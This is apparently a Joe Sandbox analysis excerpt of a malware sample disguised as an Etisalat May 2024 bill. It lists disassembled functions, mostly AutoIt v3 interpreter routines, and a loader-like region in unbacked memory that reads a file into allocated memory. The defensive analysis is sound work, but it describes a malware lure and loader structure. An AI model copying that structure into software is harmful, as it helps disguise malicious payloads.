                                      • Source File: 00000000.00000002.1977357519.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                      • Associated: 00000000.00000002.1977338070.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977398175.0000000000BEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977398175.0000000000C15000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977446502.0000000000C1F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977463502.0000000000C28000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_b60000_Details of Your Etisalat Summary Bill for the Month of May 2024.jbxd
                                      Similarity
                                      • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                                      • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                      • API String ID: 2914291525-1005189915
                                      • Opcode ID: 7669a30c70c9e3c515f1a35fb65b81fff8c373d272b4a497716c218187f6444c
                                      • Instruction ID: 44c9a2a45a10e7f8fba54917cf818c99ca0e5dbfb4c41ae6f3fa0a4fe257435e
                                      • Opcode Fuzzy Hash: 7669a30c70c9e3c515f1a35fb65b81fff8c373d272b4a497716c218187f6444c
                                      • Instruction Fuzzy Hash: 1521C7B1911259EFDB10DFA4EC89BADBBF4FB08700F00812AF510AB2A0DBB545458FA1
                                      Function 00B671EB Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 201registryCOMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      APIs
                                        • Part of subcall function 00B64864: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,00C262F8,?,00B637C0,?), ref: 00B64882
                                        • Part of subcall function 00B8074F: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,00B672C5), ref: 00B80771
                                      • RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,\Include\), ref: 00B67308
                                      • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?), ref: 00B9ECF1
                                      • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000), ref: 00B9ED32
                                      • RegCloseKey.ADVAPI32(?), ref: 00B9ED70
                                      • _wcscat.LIBCMT ref: 00B9EDC9
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1977357519.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                      • Associated: 00000000.00000002.1977338070.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977398175.0000000000BEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977398175.0000000000C15000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977446502.0000000000C1F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977463502.0000000000C28000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_b60000_Details of Your Etisalat Summary Bill for the Month of May 2024.jbxd
                                      Similarity
                                      • API ID: NameQueryValue$CloseFileFullModuleOpenPath_wcscat
                                      • String ID: Include$Software\AutoIt v3\AutoIt$\$\Include\
                                      • API String ID: 2673923337-2727554177
                                      • Opcode ID: 4acd1eb8d03002584916fe804e44465c4ef2dbfa80db902f6a3949a5248f34dd
                                      • Instruction ID: 8569697909ca1716aaa7977380e22120ce1129e3ea784337345b3e1b4d16c6f5
                                      • Opcode Fuzzy Hash: 4acd1eb8d03002584916fe804e44465c4ef2dbfa80db902f6a3949a5248f34dd
                                      • Instruction Fuzzy Hash: F6715971419301DAC724EF25EC81AAFBBE8FF58740F440A6EF455871A1EB309949CB62
                                      Function 00B63A58 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 71windowregistryCOMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      APIs
                                      • GetSysColorBrush.USER32(0000000F), ref: 00B63A62
                                      • LoadCursorW.USER32(00000000,00007F00), ref: 00B63A71
                                      • LoadIconW.USER32(00000063), ref: 00B63A88
                                      • LoadIconW.USER32(000000A4), ref: 00B63A9A
                                      • LoadIconW.USER32(000000A2), ref: 00B63AAC
                                      • LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 00B63AD2
                                      • RegisterClassExW.USER32(?), ref: 00B63B28
                                        • Part of subcall function 00B63041: GetSysColorBrush.USER32(0000000F), ref: 00B63074
                                        • Part of subcall function 00B63041: RegisterClassExW.USER32(00000030), ref: 00B6309E
                                        • Part of subcall function 00B63041: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00B630AF
                                        • Part of subcall function 00B63041: InitCommonControlsEx.COMCTL32(?), ref: 00B630CC
                                        • Part of subcall function 00B63041: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00B630DC
                                        • Part of subcall function 00B63041: LoadIconW.USER32(000000A9), ref: 00B630F2
                                        • Part of subcall function 00B63041: ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00B63101
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1977357519.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                      • Associated: 00000000.00000002.1977338070.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977398175.0000000000BEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977398175.0000000000C15000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977446502.0000000000C1F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977463502.0000000000C28000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_b60000_Details of Your Etisalat Summary Bill for the Month of May 2024.jbxd
                                      Similarity
                                      • API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
                                      • String ID: #$0$AutoIt v3
                                      • API String ID: 423443420-4155596026
                                      • Opcode ID: a1266557a3f52bcb47935a13d314be6815c8e08c5f5369f47d92897adb5bb3b6
                                      • Instruction ID: dbb4a27bf7c6a871ae94339f69a70c0dc757cc87b178feee1d4ef207f82905fb
                                      • Opcode Fuzzy Hash: a1266557a3f52bcb47935a13d314be6815c8e08c5f5369f47d92897adb5bb3b6
                                      • Instruction Fuzzy Hash: B8216D71D10304EFEB219FA4EC49BAD7BF4FB08714F004169F504A72A0C7B95A558F60
                                      Function 00B63633 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 151windowtimeregistryCOMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 767 b63633-b63681 769 b63683-b63686 767->769 770 b636e1-b636e3 767->770 772 b636e7 769->772 773 b63688-b6368f 769->773 770->769 771 b636e5 770->771 774 b636ca-b636d2 DefWindowProcW 771->774 775 b9d31c-b9d34a call b711d0 call b711f3 772->775 776 b636ed-b636f0 772->776 777 b63695-b6369a 773->777 778 b6375d-b63765 PostQuitMessage 773->778 779 b636d8-b636de 774->779 810 b9d34f-b9d356 775->810 781 b63715-b6373c SetTimer RegisterWindowMessageW 776->781 782 b636f2-b636f3 776->782 783 b9d38f-b9d3a3 call bc2a16 777->783 784 b636a0-b636a2 777->784 780 b63711-b63713 778->780 780->779 781->780 788 b6373e-b63749 CreatePopupMenu 781->788 786 b9d2bf-b9d2c2 782->786 787 b636f9-b6370c KillTimer call b644cb call b63114 782->787 783->780 801 b9d3a9 783->801 789 b63767-b63776 call b64531 784->789 790 b636a8-b636ad 784->790 795 b9d2f8-b9d317 MoveWindow 786->795 796 b9d2c4-b9d2c6 786->796 787->780 788->780 789->780 798 b636b3-b636b8 790->798 799 b9d374-b9d37b 790->799 795->780 804 b9d2c8-b9d2cb 796->804 805 b9d2e7-b9d2f3 SetFocus 796->805 808 b636be-b636c4 798->808 809 b6374b-b6375b call b645df 798->809 799->774 807 b9d381-b9d38a call bb817e 799->807 801->774 804->808 811 b9d2d1-b9d2e2 call b711d0 804->811 805->780 807->774 808->774 808->810 809->780 810->774 816 b9d35c-b9d36f call b644cb call b643db 810->816 811->780 816->774
                                      APIs
                                      • DefWindowProcW.USER32(?,?,?,?), ref: 00B636D2
                                      • KillTimer.USER32(?,00000001), ref: 00B636FC
                                      • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00B6371F
                                      • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00B6372A
                                      • CreatePopupMenu.USER32 ref: 00B6373E
                                      • PostQuitMessage.USER32(00000000), ref: 00B6375F
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1977357519.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                      • Associated: 00000000.00000002.1977338070.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977398175.0000000000BEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977398175.0000000000C15000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977446502.0000000000C1F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977463502.0000000000C28000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_b60000_Details of Your Etisalat Summary Bill for the Month of May 2024.jbxd
                                      Similarity
                                      • API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
                                      • String ID: TaskbarCreated
                                      • API String ID: 129472671-2362178303
                                      • Opcode ID: e10c93713803a7193a2fabbdd2e3442d76ae687c04cff581c82e9d2fb0cbf92f
                                      • Instruction ID: c03b541fc08311b1ccd75fb416f740cb25ae4a5075026a7e0d141785262849e3
                                      • Opcode Fuzzy Hash: e10c93713803a7193a2fabbdd2e3442d76ae687c04cff581c82e9d2fb0cbf92f
                                      • Instruction Fuzzy Hash: C84106F2218145BBDF249F28EC89F7E37D5EB10B00F1801A9F502966A1DE789E519771
                                      Function 00B63778 Relevance: 14.3, APIs: 1, Strings: 7, Instructions: 267COMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1977357519.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                      • Associated: 00000000.00000002.1977338070.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977398175.0000000000BEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977398175.0000000000C15000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977446502.0000000000C1F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977463502.0000000000C28000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_b60000_Details of Your Etisalat Summary Bill for the Month of May 2024.jbxd
                                      Similarity
                                      • API ID: FileLibraryLoadModuleName__wcsicmp_l_memmove
                                      • String ID: /AutoIt3ExecuteLine$/AutoIt3ExecuteScript$/AutoIt3OutputDebug$/ErrorStdOut$>>>AUTOIT NO CMDEXECUTE<<<$CMDLINE$CMDLINERAW
                                      • API String ID: 1825951767-3513169116
                                      • Opcode ID: 2a608ce82df77d8878214f823c9bd720e4f23d4a8bd41b44b35f9df900e8cfd3
                                      • Instruction ID: b402a197037b569b2405f30d305d83fdab8387c855d831594f6c082fbcbf4d3d
                                      • Opcode Fuzzy Hash: 2a608ce82df77d8878214f823c9bd720e4f23d4a8bd41b44b35f9df900e8cfd3
                                      • Instruction Fuzzy Hash: 6AA15F728102699ACF14EBA0CC95EEEB7F8BF14700F1405AAF416B7191DF799A09CB60
                                      Function 015E2650 Relevance: 10.7, APIs: 7, Instructions: 239fileCOMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 942 15e2650-15e26fe call 15e0000 945 15e2705-15e272b call 15e3560 CreateFileW 942->945 948 15e272d 945->948 949 15e2732-15e2742 945->949 950 15e287d-15e2881 948->950 956 15e2749-15e2763 VirtualAlloc 949->956 957 15e2744 949->957 951 15e28c3-15e28c6 950->951 952 15e2883-15e2887 950->952 958 15e28c9-15e28d0 951->958 954 15e2889-15e288c 952->954 955 15e2893-15e2897 952->955 954->955 959 15e2899-15e28a3 955->959 960 15e28a7-15e28ab 955->960 961 15e276a-15e2781 ReadFile 956->961 962 15e2765 956->962 957->950 963 15e2925-15e293a 958->963 964 15e28d2-15e28dd 958->964 959->960 967 15e28ad-15e28b7 960->967 968 15e28bb 960->968 969 15e2788-15e27c8 VirtualAlloc 961->969 970 15e2783 961->970 962->950 965 15e293c-15e2947 VirtualFree 963->965 966 15e294a-15e2952 963->966 971 15e28df 964->971 972 15e28e1-15e28ed 964->972 965->966 967->968 968->951 975 15e27cf-15e27ea call 15e37b0 969->975 976 15e27ca 969->976 970->950 971->963 973 15e28ef-15e28ff 972->973 974 15e2901-15e290d 972->974 978 15e2923 973->978 979 15e290f-15e2918 974->979 980 15e291a-15e2920 974->980 982 15e27f5-15e27ff 975->982 976->950 978->958 979->978 980->978 983 15e2832-15e2846 call 15e35c0 982->983 984 15e2801-15e2830 call 15e37b0 982->984 990 15e284a-15e284e 983->990 991 15e2848 983->991 984->982 992 15e285a-15e285e 990->992 993 15e2850-15e2854 FindCloseChangeNotification 990->993 991->950 994 15e286e-15e2877 992->994 995 15e2860-15e286b VirtualFree 992->995 993->992 994->945 994->950 995->994
                                      APIs
                                      • CreateFileW.KERNELBASE(00000000,?,80000000,00000007,00000000,00000003,00000080,00000000,?,00000000), ref: 015E2721
                                      • VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 015E2947
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1977906262.00000000015E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015E0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_15e0000_Details of Your Etisalat Summary Bill for the Month of May 2024.jbxd
                                      Similarity
                                      • API ID: CreateFileFreeVirtual
                                      • String ID:
                                      • API String ID: 204039940-0
                                      • Opcode ID: 1376b1c019e97a58b345df4903236ecb5f0b8c205347a8d20aa61bd2a2b0f564
                                      • Instruction ID: 6d8ad34abde1c6dc3ecdc0a3ed143cfbb3546061e2fd60b614b55249d7ed46c4
                                      • Opcode Fuzzy Hash: 1376b1c019e97a58b345df4903236ecb5f0b8c205347a8d20aa61bd2a2b0f564
                                      • Instruction Fuzzy Hash: ADA12B74E04209EBDB18CFA4C898BEEBBB9FF48304F208559E505BB284D7759A81CF54
                                      Function 00B639E7 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 44COMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 1073 b639e7-b63a57 CreateWindowExW * 2 ShowWindow * 2
                                      APIs
                                      • CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00B63A15
                                      • CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00B63A36
                                      • ShowWindow.USER32(00000000,?,?), ref: 00B63A4A
                                      • ShowWindow.USER32(00000000,?,?), ref: 00B63A53
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1977357519.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                      • Associated: 00000000.00000002.1977338070.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977398175.0000000000BEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977398175.0000000000C15000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977446502.0000000000C1F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977463502.0000000000C28000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_b60000_Details of Your Etisalat Summary Bill for the Month of May 2024.jbxd
                                      Similarity
                                      • API ID: Window$CreateShow
                                      • String ID: AutoIt v3$edit
                                      • API String ID: 1584632944-3779509399
                                      • Opcode ID: e112e3b8f9996657a70364920a791193a9b0987d5ba540ea0a4aea49cbe6892b
                                      • Instruction ID: f01443024eb0e35c4200747ab58523e1f390b0a14160af914223ba89daa19541
                                      • Opcode Fuzzy Hash: e112e3b8f9996657a70364920a791193a9b0987d5ba540ea0a4aea49cbe6892b
                                      • Instruction Fuzzy Hash: C5F03A71610290FEEA311B236C48F3B2E7DD7C6F50B01002AB900A6170C6B50C42CAB0
                                      Function 015E2410 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 146fileCOMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 1074 15e2410-15e2547 call 15e0000 call 15e2300 CreateFileW 1081 15e254e-15e255e 1074->1081 1082 15e2549 1074->1082 1085 15e2565-15e257f VirtualAlloc 1081->1085 1086 15e2560 1081->1086 1083 15e25fe-15e2603 1082->1083 1087 15e2583-15e259a ReadFile 1085->1087 1088 15e2581 1085->1088 1086->1083 1089 15e259e-15e25d8 call 15e2340 call 15e1300 1087->1089 1090 15e259c 1087->1090 1088->1083 1095 15e25da-15e25ef call 15e2390 1089->1095 1096 15e25f4-15e25fc ExitProcess 1089->1096 1090->1083 1095->1096 1096->1083
                                      APIs
                                        • Part of subcall function 015E2300: Sleep.KERNELBASE(000001F4), ref: 015E2311
                                      • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 015E253D
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1977906262.00000000015E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015E0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_15e0000_Details of Your Etisalat Summary Bill for the Month of May 2024.jbxd
                                      Similarity
                                      • API ID: CreateFileSleep
                                      • String ID: VOGW08WITY
                                      • API String ID: 2694422964-3814410972
                                      • Opcode ID: ee391977bb2ea0fd8ef1eace58d1b6c297a9d4712b1af7c3c43f3b86ad31ccde
                                      • Instruction ID: ff021cfab1abcc741e04b3848ffabfdb6dd2509b46fed4871e0a302326f35304
                                      • Opcode Fuzzy Hash: ee391977bb2ea0fd8ef1eace58d1b6c297a9d4712b1af7c3c43f3b86ad31ccde
                                      • Instruction Fuzzy Hash: BF519030D04249EBEF14DBE4D959BEEBBB9AF48300F104599E609BB2C0D7791B44CBA5
                                      Function 00B6410D Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 88windowCOMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 1098 b6410d-b64123 1099 b64200-b64204 1098->1099 1100 b64129-b6413e call b67b76 1098->1100 1103 b64144-b64164 call b67d2c 1100->1103 1104 b9d5dd-b9d5ec LoadStringW 1100->1104 1107 b9d5f7-b9d60f call b67c8e call b67143 1103->1107 1108 b6416a-b6416e 1103->1108 1104->1107 1116 b6417e-b641fb call b83020 call b6463e call b82ffc Shell_NotifyIconW call b65a64 1107->1116 1120 b9d615-b9d633 call b67e0b call b67143 call b67e0b 1107->1120 1111 b64174-b64179 call b67c8e 1108->1111 1112 b64205-b6420e call b681a7 1108->1112 1111->1116 1112->1116 1116->1099 1120->1116
                                      APIs
                                      • LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 00B9D5EC
                                        • Part of subcall function 00B67D2C: _memmove.LIBCMT ref: 00B67D66
                                      • _memset.LIBCMT ref: 00B6418D
                                      • _wcscpy.LIBCMT ref: 00B641E1
                                      • Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00B641F1
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1977357519.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                      • Associated: 00000000.00000002.1977338070.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977398175.0000000000BEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977398175.0000000000C15000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977446502.0000000000C1F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977463502.0000000000C28000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_b60000_Details of Your Etisalat Summary Bill for the Month of May 2024.jbxd
                                      Similarity
                                      • API ID: IconLoadNotifyShell_String_memmove_memset_wcscpy
                                      • String ID: Line:
                                      • API String ID: 3942752672-1585850449
                                      • Opcode ID: 8888d0a2f0655b8fd39b016d96282e7e332cb0f4a12611587d3b384a361f2e48
                                      • Instruction ID: 7990d38d54f6edd94527f9174dc72219a4e71528cc3a2e54140f7775608f4939
                                      • Opcode Fuzzy Hash: 8888d0a2f0655b8fd39b016d96282e7e332cb0f4a12611587d3b384a361f2e48
                                      • Instruction Fuzzy Hash: 2A31F471008304AAD731EB60DC86FDF77ECAF45304F1049AEF185920A1EF78AA49C7A2
                                      Function 00B8564D Relevance: 7.7, APIs: 5, Instructions: 163COMMONLIBRARYCODE
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 1133 b8564d-b85666 1134 b85668-b8566d 1133->1134 1135 b85683 1133->1135 1134->1135 1136 b8566f-b85671 1134->1136 1137 b85685-b8568b 1135->1137 1138 b8568c-b85691 1136->1138 1139 b85673-b85678 call b88d68 1136->1139 1140 b8569f-b856a3 1138->1140 1141 b85693-b8569d 1138->1141 1151 b8567e call b88ff6 1139->1151 1144 b856b3-b856b5 1140->1144 1145 b856a5-b856b0 call b83020 1140->1145 1141->1140 1143 b856c3-b856d2 1141->1143 1149 b856d9 1143->1149 1150 b856d4-b856d7 1143->1150 1144->1139 1148 b856b7-b856c1 1144->1148 1145->1144 1148->1139 1148->1143 1153 b856de-b856e3 1149->1153 1150->1153 1151->1135 1155 b856e9-b856f0 1153->1155 1156 b857cc-b857cf 1153->1156 1157 b85731-b85733 1155->1157 1158 b856f2-b856fa 1155->1158 1156->1137 1159 b8579d-b8579e call b90df7 1157->1159 1160 b85735-b85737 1157->1160 1158->1157 1161 b856fc 1158->1161 1168 b857a3-b857a7 1159->1168 1163 b85739-b85741 1160->1163 1164 b8575b-b85766 1160->1164 1165 b857fa 1161->1165 1166 b85702-b85704 1161->1166 1169 b85751-b85755 1163->1169 1170 b85743-b8574f 1163->1170 1171 b85768 1164->1171 1172 b8576a-b8576d 1164->1172 1167 b857fe-b85807 1165->1167 1173 b8570b-b85710 1166->1173 1174 b85706-b85708 1166->1174 1167->1137 1168->1167 1177 b857a9-b857ae 1168->1177 1178 b85757-b85759 1169->1178 1170->1178 1171->1172 1175 b857d4-b857d8 1172->1175 1179 b8576f-b8577b call b84916 call b910ab 1172->1179 1173->1175 1176 b85716-b8572f call b90f18 1173->1176 1174->1173 1182 b857ea-b857f5 call b88d68 1175->1182 1183 b857da-b857e7 call b83020 1175->1183 1192 b85792-b8579b 1176->1192 1177->1175 1181 b857b0-b857c1 1177->1181 1178->1172 1194 b85780-b85785 1179->1194 1187 b857c4-b857c6 1181->1187 1182->1151 1183->1182 1187->1155 1187->1156 1192->1187 1195 b8578b-b8578e 1194->1195 1196 b8580c-b85810 1194->1196 1195->1165 1197 b85790 1195->1197 1196->1167 1197->1192
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1977357519.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                      • Associated: 00000000.00000002.1977338070.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977398175.0000000000BEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977398175.0000000000C15000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977446502.0000000000C1F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977463502.0000000000C28000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_b60000_Details of Your Etisalat Summary Bill for the Month of May 2024.jbxd
                                      Similarity
                                      • API ID: _memset$__filbuf__getptd_noexit__read_nolock_memcpy_s
                                      • String ID:
                                      • API String ID: 1559183368-0
                                      • Opcode ID: cbc132a2d90f1fa170c901e77712e707e3c45fd9b9f6dd10e42efcbbdaed9f46
                                      • Instruction ID: 96307a8f8aebab69c555334f74bf653166ab0c1161ce04bbac3d8261fe1fc667
                                      • Opcode Fuzzy Hash: cbc132a2d90f1fa170c901e77712e707e3c45fd9b9f6dd10e42efcbbdaed9f46
                                      • Instruction Fuzzy Hash: A6517274A00B06DBDB34AEA9C8846AE77E5EF40320F64C7A9E825962F0E7719D50DB50
                                      Function 00B669CA Relevance: 7.3, APIs: 2, Strings: 2, Instructions: 260COMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 00B64F3D: LoadLibraryExW.KERNELBASE(?,00000000,00000002,?,00C262F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00B64F6F
                                      • _free.LIBCMT ref: 00B9E68C
                                      • _free.LIBCMT ref: 00B9E6D3
                                        • Part of subcall function 00B66BEC: SetCurrentDirectoryW.KERNEL32(?,?,?,?,00000000), ref: 00B66D0D
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1977357519.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                      • Associated: 00000000.00000002.1977338070.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977398175.0000000000BEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977398175.0000000000C15000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977446502.0000000000C1F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977463502.0000000000C28000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_b60000_Details of Your Etisalat Summary Bill for the Month of May 2024.jbxd
                                      Similarity
                                      • API ID: _free$CurrentDirectoryLibraryLoad
                                      • String ID: >>>AUTOIT SCRIPT<<<$Bad directive syntax error
                                      • API String ID: 2861923089-1757145024
                                      • Opcode ID: 366be1f172f22e7c96495aec7cb60c4a1c9effd9b62be302b7e7bb7c246db925
                                      • Instruction ID: 0e0c65b408a09a0d2617830502c4af04b4c82fa28d1deacc48d13ca93171b773
                                      • Opcode Fuzzy Hash: 366be1f172f22e7c96495aec7cb60c4a1c9effd9b62be302b7e7bb7c246db925
                                      • Instruction Fuzzy Hash: BA914A71910219AFCF14EFA4CC919EDB7F4FF19314F1444AAE825AB2A1EB34E905CB60
                                      Function 00B635B0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 59registryCOMMON
                                      Download Yara Rule
                                      APIs
                                      • RegOpenKeyExW.KERNELBASE(80000001,Control Panel\Mouse,00000000,00000001,00000000,00000003,00000000,80000001,80000001,?,00B635A1,SwapMouseButtons,00000004,?), ref: 00B635D4
                                      • RegQueryValueExW.KERNELBASE(00000000,00000000,00000000,00000000,?,?,?,?,00B635A1,SwapMouseButtons,00000004,?,?,?,?,00B62754), ref: 00B635F5
                                      • RegCloseKey.KERNELBASE(00000000,?,?,00B635A1,SwapMouseButtons,00000004,?,?,?,?,00B62754), ref: 00B63617
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1977357519.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                      • Associated: 00000000.00000002.1977338070.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977398175.0000000000BEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977398175.0000000000C15000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977446502.0000000000C1F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977463502.0000000000C28000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_b60000_Details of Your Etisalat Summary Bill for the Month of May 2024.jbxd
                                      Similarity
                                      • API ID: CloseOpenQueryValue
                                      • String ID: Control Panel\Mouse
                                      • API String ID: 3677997916-824357125
